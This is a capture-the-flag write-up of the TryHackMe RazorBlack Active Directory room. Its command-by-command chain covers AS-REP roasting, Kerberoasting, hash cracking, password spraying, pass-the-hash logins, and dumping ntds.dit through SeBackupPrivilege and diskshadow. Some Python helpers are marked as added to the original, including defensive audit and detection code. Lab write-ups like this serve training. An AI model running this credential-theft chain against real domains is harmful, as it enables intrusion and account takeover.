RazorBlack: Active Directory Room From TryHackMe By Hashar Mujahid

Hashar Mujahid | Published in InfoSec Write-ups | Aug 9, 2022 | 10 min read

These guys call themselves hackers. Can you show them who’s the boss?

RazorBlack

Initial Enumeration:

We can start off with an nmap port scan to see which services our target is running.

sudo nmap -sC -sV -p- --min-rate 1500 <Target-IP>
Nmap Scan
Domain Name

Our target domain is “raz0rblack.thm”. Let's add it to our hosts file and continue enumeration.

SMB is open; let's try to enumerate some shares.

SMB ENUMERATION:

I tried many tools, but it looks like we cannot enumerate the shares.

Crackmapexec

User Enumeration With Kerbrute:

We can try to enumerate valid users using kerbrute.

Kerbrute

We couldn't find any other users.

RPC ENUMERATION:

We have RPC on port 111; let's try to enumerate that. There are great instructions on HackTricks on how to enumerate RPC.

During reading the instruction I found something interesting.

HackTricks

If I recall correctly, we have NFS running on port 2049.

We can run showmount -e <ip-address> to list any shared directories.
Showmount

We can see there is a /users directory. We can mount this directory and get its contents.

Mounting /users

You can retrieve the flag inside sbradley.txt. Also take a look inside employee_status.xlsx.

employee_status.xlsx

We have a list of employee names, but first we have to convert them into the naming convention used by the AD. As we have seen from the file named sbradley.txt in the directory, each username is the first character of the first name followed by the last name.

Formatted usernames
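Doing that conversion by hand gets error-prone once the list is long, so here is a small script (added for this write-up, not part of the original post or the room) that applies the first-initial plus last-name rule, strips accents and punctuation, and de-duplicates the result; the employee names in it are constructed samples, and it goes a little beyond the room by handling hyphenated and accented names.

```python
import re
import unicodedata


def _clean(s):
    """Lower-case and keep only a-z and 0-9 (drops hyphens, apostrophes, dots)."""
    return re.sub(r"[^a-z0-9]", "", s.lower())


def ad_username(full_name):
    """First initial + last name, lower-case ASCII: 'Ljudmila Vetrova' -> 'lvetrova'.
    Middle names are ignored; accents, hyphens and apostrophes are stripped."""
    ascii_name = (unicodedata.normalize("NFKD", full_name)
                  .encode("ascii", "ignore").decode())
    parts = ascii_name.split()
    if not parts:
        raise ValueError("empty name")
    if len(parts) == 1:                 # already a bare username such as xyan1d3
        return _clean(parts[0])
    return _clean(parts[0])[:1] + _clean(parts[-1])


def build_userlist(names):
    """Convert every name and drop duplicates while keeping the order (kerbrute input)."""
    seen, out = set(), []
    for name in names:
        user = ad_username(name)
        if user not in seen:
            seen.add(user)
            out.append(user)
    return out


# Constructed sample names: only the surnames Bradley, Williams and Vetrova occur in the room.
SAMPLE_NAMES = ["Sam Bradley", "Tom Williams", "Ljudmila Vetrova",
                "Anne-Marie O'Neil", "  Sam   Bradley ", "Ljudmila Vetrová", "xyan1d3"]

if __name__ == "__main__":
    print("\n".join(build_userlist(SAMPLE_NAMES)))
```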

AS-REP ROASTING:

Now that we have a list of hopefully valid usernames, we can apply the AS-REP roasting technique to get a crackable AS-REP hash for any user who has Kerberos pre-authentication disabled.

If you want to learn what AS-REP roasting is, you can watch this video by Conda.

The tool that helps us perform this technique is GetNPUsers.py, which is part of impacket.

Syntax:

GetNPUsers.py -no-pass -usersfile validusers.txt <domain>/
AS-REP roasting

We got the hash of user twilliams because Kerberos pre-authentication is not enabled for his account.

Now we just need to crack the hash using hashcat.

hashcat -m 18200 hash <wordlist path>
hashcat

Now we have the username twilliams and his password. We can try to enumerate the shares as twilliams.

Twilliams-Shares:

We can use smbclient or smbmap to list the shares.

SHARES

None of the other shares are useful except trash. Let's connect to it.

Access denied

Password Spraying:

What we can do is use crackmapexec for a technique called password spraying, to see if any other user is using the same password.

crackmapexec smb <ip> -u <usernames> -p <passwords>
Password Spraying

We see that the user sbradley gets a message saying he must change his password, which means the password is valid for him too. We can set a new password for him and use that to log in.

We can use the smbpasswd tool to set a new password for him.

smbpasswd -r <ip> -U <user>
Smbpasswd

Now let's connect to the shares with the user sbradley and the password you set. I set it to smbpassword101.

You may find it difficult to download the zip file.

You can use smbget to download it.

smbget

We also have a chat log.

┌──(kali㉿kali)-[~/Desktop/CTFs/Razorblack.thm]
└─$ cat chat_log_20210222143423.txt
sbradley> Hey Administrator our machine has the newly disclosed vulnerability for Windows Server 2019.
Administrator> What vulnerability??
sbradley> That new CVE-2020-1472 which is called ZeroLogon has released a new PoC.
Administrator> I have given you the last warning. If you exploit this on this Domain Controller as you did previously on our old Ubuntu server with dirtycow, I swear I will kill your WinRM-Access.
sbradley> Hey you won't believe what I am seeing.
Administrator> Now, don't say that you ran the exploit.
sbradley> Yeah, The exploit works great it needs nothing like credentials. Just give it IP and domain name and it resets the Administrator pass to an empty hash.
sbradley> I also used some tools to extract ntds. dit and SYSTEM.hive and transferred it into my box. I love running secretsdump.py on those files and dumped the hash.
Administrator> I am feeling like a new cron has been issued in my body named heart attack which will be executed within the next minute.
Administrator> But, Before I die I will kill your WinRM access..........
sbradley> I have made an encrypted zip containing the ntds.dit and the SYSTEM.hive and uploaded the zip inside the trash share.
sbradley> Hey Administrator are you there ...
sbradley> Administrator .....
The administrator died after this incident.Press F to pay respects

That means the ntds.dit is in our zip; let's unzip it.

password protected

Our zip file is password protected. We can use zip2john to get the password hash and then use john to crack it.

zip2john:

zip2john experiment_gone_wrong.zip > ziphash.txt
zip2john

John:

john --wordlist=rockyou.txt ziphash.txt
john

Now let's unzip it.

unzipped

Now we have ntds.dit and the SYSTEM hive.

We can use secretsdump.py to dump the hashes from these files.

Secretsdump.py:

Secretsdump.py

This will create a ntds.unshadowed file in the working directory.

Now, all we need is to answer the questions.

We need to do some formatting if we want to use the hashes to find the answers.

Example

We see that the hash we need comes after the fourth delimiter ‘:’.

We can use awk to extract only the NTLM hashes and save them in a separate file.

Formatting
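As an added example (not from the original write-up), here is a parser for secretsdump.py-style NTDS output that produces the same hash list as the awk one-liner and also audits the dump: it flags accounts with the empty-password NT hash (the Zerologon symptom from the chat log) and user accounts that share a hash (what the password-spraying step found). The dump it parses is constructed sample data; the hashes, RIDs and the domain prefix are not from the room.

```python
from collections import defaultdict

# NT hash of the empty password. An account reset to an "empty hash", as the
# chat log describes for Zerologon, shows up in the dump with exactly this value.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample output in secretsdump.py's NTDS format
# (domain\user:RID:LMhash:NThash:::); not the real dump from the room.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
RAZ0RBLACK\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RAZ0RBLACK\\twilliams:1104:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
RAZ0RBLACK\\sbradley:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
RAZ0RBLACK\\lvetrova:1106:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
[*] Cleaning up...
"""


def parse_secretsdump(text):
    """Yield (account, rid, nt_hash) for every credential line, skipping [*] status lines."""
    for line in text.splitlines():
        fields = line.split(":")
        if line.startswith("[") or len(fields) < 4:
            continue
        account, rid, _lm, nt = fields[:4]
        nt = nt.lower()
        if rid.isdigit() and len(nt) == 32 and all(c in "0123456789abcdef" for c in nt):
            yield account.split("\\")[-1], int(rid), nt     # drop the domain prefix


def nt_hashes(text):
    """The same list the awk command produces: one NT hash per credential line."""
    return [nt for _, _, nt in parse_secretsdump(text)]


def audit(text):
    """Blank passwords and hashes shared by several user accounts (machine accounts ignored)."""
    by_hash = defaultdict(list)
    for user, _rid, nt in parse_secretsdump(text):
        if not user.endswith("$"):
            by_hash[nt].append(user)
    blank = sorted(by_hash.get(EMPTY_NT, []))
    shared = {h: sorted(u) for h, u in by_hash.items() if len(u) > 1 and h != EMPTY_NT}
    return {"blank": blank, "shared": shared}
```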

Ljudmila’s Hash:

We can brute force SMB with crackmapexec using the NT hashes and find the valid hash of lvetrova.

We have the hash; now we can log in using evil-winrm (pass-the-hash).

LOGIN AND PSCREDENTIAL

Our flag is stored in a PSCredential; we can decode it using the following.

FAILED

The above method failed. We can try this method instead.

To encode:

$password = ConvertTo-SecureString "TestPassword" -AsPlainText -Force
$credentials = New-Object System.Net.NetworkCredential("TestUsername", $password, "TestDomain")

To decode:

# Marshal needs the SecureString, which NetworkCredential exposes as .SecurePassword
# (.Password would return the plaintext string directly and make the Marshal call fail).
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($credentials.SecurePassword)
$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)   # wipe and free the unmanaged copy
$result

In the Users directory, I found a new username xyan1d3. Add it to our username list.

We can do Kerberoasting to look for service tickets.

Kerberoasting:

Kerberoasting is a post-exploitation technique that targets the password of an Active Directory (AD) service account. Any authenticated domain user can request a Kerberos service ticket (TGS) for an account that has a service principal name (SPN); part of that ticket is encrypted with the service account's password hash, so it can be taken offline and cracked.

Impacket GetUserSPNs.py:

We can use impacket’s GetUserSPNs.py, authenticating as lvetrova with her hash, to Kerberoast.

Syntax:

GetUserSPNs.py <domain_name>/<domain_user> -hashes <LMHASH>:<NTHASH> -request -outputfile <output_TGSs_file>

We can see there is a service ticket for xyan1d3; we can request it from the domain.

Ticket

Now all we need is to crack this hash with hashcat.

hashcat -m 13100 hash rockyou.txt
Cracked
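Both Kerberos attacks in this write-up leave traces on the domain controller, so here is the defender's counterpart as an added example (not from the original post), covering the AS-REP roasting section above as well: it checks event 4768 for TGTs issued with Pre-Authentication Type 0 and event 4769 for RC4-encrypted (0x17) service-ticket requests. The events, client IPs and the svc_sql/DC01$ accounts are constructed samples.

```python
from collections import Counter, namedtuple

# Fields taken from DC security-log events 4768 (TGT requested) and 4769 (TGS requested).
Event = namedtuple("Event", "event_id client_ip account service pre_auth_type enc_type")

# Constructed sample events (not real log data). pre_auth_type 0 = no pre-auth,
# 2 = PA-ENC-TIMESTAMP; enc_type 0x17 = RC4-HMAC, 0x12 = AES256.
SAMPLE_EVENTS = [
    Event(4768, "10.10.14.5", "twilliams", "krbtgt", 0, "0x17"),     # AS-REP roastable
    Event(4768, "10.10.10.2", "sbradley", "krbtgt", 2, "0x12"),      # normal logon
    Event(4769, "10.10.14.5", "lvetrova", "xyan1d3", None, "0x17"),  # RC4 TGS for SPN account
    Event(4769, "10.10.14.5", "lvetrova", "svc_sql", None, "0x17"),  # second RC4 TGS
    Event(4769, "10.10.14.5", "lvetrova", "DC01$", None, "0x12"),    # AES TGS for a machine
    Event(4769, "10.10.10.2", "sbradley", "svc_sql", None, "0x17"),  # single RC4 request
]


def asrep_exposed(events):
    """Accounts that received a TGT without pre-authentication (4768, type 0).
    Fix: clear 'Do not require Kerberos preauthentication' on those accounts."""
    return sorted({e.account for e in events
                   if e.event_id == 4768 and e.pre_auth_type == 0})


def kerberoast_suspects(events, min_rc4_requests=2):
    """(client_ip, requesting account) pairs that pulled at least N RC4-encrypted
    service tickets for non-machine SPN accounts, the GetUserSPNs.py -request pattern.
    Fix: AES-only service accounts (or gMSAs) and long service-account passwords."""
    rc4 = Counter((e.client_ip, e.account) for e in events
                  if e.event_id == 4769 and e.enc_type == "0x17"
                  and not e.service.endswith("$"))
    return {pair: n for pair, n in rc4.items() if n >= min_rc4_requests}


if __name__ == "__main__":
    print("AS-REP roastable:", asrep_exposed(SAMPLE_EVENTS))
    print("Kerberoast suspects:", kerberoast_suspects(SAMPLE_EVENTS))
```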

Now let's log in as Xyan1d3.

We have to repeat the whole PSCredential decode process again.

decoded

Now comes the toughest part of the puzzle: getting root!

We can try to run SharpHound.ps1

Uploading SharpHound.ps1

FAILED.

After trying a lot of things I came across something interesting.

Whoami /all
Privileges

In PEH (Practical Ethical Hacking) by TCM Security, Heath Adams does mention this privilege being abusable. Let's see.

This is a great article on the topic, and if you prefer a video there is a great one by Conda.

Now we need to create a script to start the backup process.

A guide on how to create the script.

set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive

create

expose %mydrive% w:
end backup

You may need to add an extra letter at the end of every line in the script.

Like this

For some weird reason, the last letter of every line is skipped.

Now it works fine.

After that upload it to target.

Script.txt
Upload

Now we just need to execute it using diskshadow utility.

diskshadow /s backup.txt
backup

Second, we need to download the DLL files from the repository given below.

The first, “SeBackupPrivilegeCmdLets.dll”, checks whether SeBackupPrivilege is enabled, and the second, “SeBackupPrivilegeUtils.dll”, copies files.

Remember that before using the copy feature you must first create a shadow copy of the files you wish to retrieve: because the files are in use, you cannot copy them directly. The Copy-FileSeBackupPrivilege function is an alternative to using the robocopy utility.

Now upload both DLLs to the target using evil-winrm’s upload command.

Now we need to import these DLLs using the Import-Module command.

Now we can validate our privileges. After that, we need to use the Copy-FileSeBackupPrivilege to copy the backup into our directory.

Get-SeBackupPrivilege
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\users\xyan1d3\ntds.dit -Overwrite

The last two commands copy the ntds.dit and the SYSTEM hive files.

Now download these files onto your Host machine.

Now we can again use Secretsdump.py to get the hashes.

Secretsdump.py
AdminHASH

We can now log in as Admin.

Now just Get the flags in Home directory.

pscredentials

It is not a PSCredential; it is just plain hex.

Just go to CyberChef or any hex decoder and decode it.

We also need the Tyson flag.

It was in twilliams directory.

Finally, we hacked this one.

Hope you like it.


IBM CSA | Google IT Support | Jr Penetration Tester | Ethical Hacker | THM TOP 1% | Hacker rank On HTB